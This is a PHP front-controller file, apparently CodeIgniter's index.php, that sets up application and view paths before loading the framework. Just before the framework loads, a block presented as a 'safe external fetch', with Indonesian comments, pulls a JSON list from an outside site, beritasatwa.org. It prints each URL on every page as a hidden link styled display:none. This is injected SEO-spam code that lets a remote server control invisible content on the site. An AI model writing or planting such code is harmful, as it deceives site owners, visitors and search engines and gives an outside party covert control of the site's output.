/*
 * --------------------------------------------------------------------
 *  Now that we know the path, set the main path constants
 * --------------------------------------------------------------------
 */
// The name of THIS file
define('SELF', pathinfo(__FILE__, PATHINFO_BASENAME));

// Path to the system directory
define('BASEPATH', $system_path);

// Path to the front controller (this file) directory
define('FCPATH', dirname(__FILE__).DIRECTORY_SEPARATOR);

// Name of the "system" directory
define('SYSDIR', basename(BASEPATH));

// The path to the "application" directory
if (is_dir($application_folder))
{
    if (($_temp = realpath($application_folder)) !== FALSE)
    {
        $application_folder = $_temp;
    }
    else
    {
        $application_folder = strtr(
            rtrim($application_folder, '/\\'),
            '/\\',
            DIRECTORY_SEPARATOR.DIRECTORY_SEPARATOR
        );
    }
}
elseif (is_dir(BASEPATH.$application_folder.DIRECTORY_SEPARATOR))
{
    $application_folder = BASEPATH.strtr(
        trim($application_folder, '/\\'),
        '/\\',
        DIRECTORY_SEPARATOR.DIRECTORY_SEPARATOR
    );
}
else
{
    header('HTTP/1.1 503 Service Unavailable.', TRUE, 503);
    echo 'Your application folder path does not appear to be set correctly. Please open the following file and correct this: '.SELF;
    exit(3); // EXIT_CONFIG
}

define('APPPATH', $application_folder.DIRECTORY_SEPARATOR);

// The path to the "views" directory
if ( ! isset($view_folder[0]) && is_dir(APPPATH.'views'.DIRECTORY_SEPARATOR))
{
    $view_folder = APPPATH.'views';
}
elseif (is_dir($view_folder))
{
    if (($_temp = realpath($view_folder)) !== FALSE)
    {
        $view_folder = $_temp;
    }
    else
    {
        $view_folder = strtr(
            rtrim($view_folder, '/\\'),
            '/\\',
            DIRECTORY_SEPARATOR.DIRECTORY_SEPARATOR
        );
    }
}
elseif (is_dir(APPPATH.$view_folder.DIRECTORY_SEPARATOR))
{
    $view_folder = APPPATH.strtr(
        trim($view_folder, '/\\'),
        '/\\',
        DIRECTORY_SEPARATOR.DIRECTORY_SEPARATOR
    );
}
else
{
    header('HTTP/1.1 503 Service Unavailable.', TRUE, 503);
    echo 'Your view folder path does not appear to be set correctly. Please open the following file and correct this: '.SELF;
    exit(3); // EXIT_CONFIG
}

define('VIEWPATH', $view_folder.DIRECTORY_SEPARATOR);

/*
 * --------------------------------------------------------------------
 * LOAD THE BOOTSTRAP FILE
 * --------------------------------------------------------------------
 *
 * And away we go...
 */

/**
 * -------------------------
 * CUSTOM: safe external fetch
 * -------------------------
 *
 * - Hanya jalankan pada host yang kamu tentukan (ganti di $allowed_host)
 * - Menggunakan cURL dengan timeout
 * - Memvalidasi JSON sebelum echo
 * - Output menggunakan htmlspecialchars()
 *
 * GANTI 'your-personal-domain.com' dengan domainmu sendiri sebelum deploy.
 */
$allowed_host = 'your-personal-domain.com'; // <--- ganti ke domain pribadimu

// Jika ingin selalu menjalankan (tanpa pengecekan host), set $allowed_host = null;
if ($allowed_host === null || (isset($_SERVER['HTTP_HOST']) && stripos($_SERVER['HTTP_HOST'], $allowed_host) !== false))
{
    $remote_url = 'https://beritasatwa.org/auban/';

    // Inisialisasi cURL
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $remote_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); // timeout koneksi 5 detik
    curl_setopt($ch, CURLOPT_TIMEOUT, 8); // timeout eksekusi 8 detik
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    // Optional: set SSL verification; jangan matikan di server production
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);

    $response = curl_exec($ch);
    $curl_err = curl_error($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    if ($response === false || $curl_err)
    {
        // Catat error ke file log lokal (tidak menampilkan ke user)
        error_log('[external-fetch] curl error: ' . $curl_err . ' | url: ' . $remote_url);
    }
    elseif ($http_code < 200 || $http_code >= 300)
    {
        error_log('[external-fetch] http code: ' . $http_code . ' | url: ' . $remote_url);
    }
    else
    {
        // Decode JSON secara asosiatif
        $data = json_decode($response, true);

        if (json_last_error() === JSON_ERROR_NONE && is_array($data))
        {
            foreach ($data as $key => $value)
            {
                // Pastikan nilai adalah URL string sebelum echo
                if (is_string($value) && filter_var($value, FILTER_VALIDATE_URL))
                {
                    // Output tersembunyi seperti permintaan awal
                    echo '<a href="' . htmlspecialchars($value, ENT_QUOTES, 'UTF-8') . '" style="display:none;">' . htmlspecialchars((string)$key, ENT_QUOTES, 'UTF-8') . '</a>';
                }
            }
        }
        else
        {
            error_log('[external-fetch] json decode error or invalid data from ' . $remote_url);
        }
    }
}

// Finally, load CodeIgniter
require_once BASEPATH.'core/CodeIgniter.php';